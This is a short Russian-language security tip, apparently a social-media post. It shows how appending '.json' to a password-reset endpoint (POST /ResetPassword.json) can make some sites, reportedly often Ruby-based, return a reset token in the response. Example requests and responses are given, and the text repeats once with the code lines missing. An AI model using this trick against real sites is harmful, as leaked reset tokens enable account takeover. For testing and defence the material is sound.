📩 Утечка конфиденциальных данных в JSON запросах
На некоторых сайтах добавление к запросу расширения
Обычный запрос:
Ответ сервера:
Но если изменить запрос и добавить
То получаем ответ:
Чаще всего данная уязвимость встречается на сайтах, использующих RUBY.
#web #ruby
На некоторых сайтах добавление к запросу расширения
.json может приводить к утечке конфиденциальных данных.Обычный запрос:
POST /ResetPassword HTTP/1.1
{"email":"[email protected]"}
Ответ сервера:
HTTP/1.1 200 OK
Но если изменить запрос и добавить
.json:
POST /ResetPassword.json HTTP/1.1 {"email":"[email protected]"}
То получаем ответ:
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
Чаще всего данная уязвимость встречается на сайтах, использующих RUBY.
#web #ruby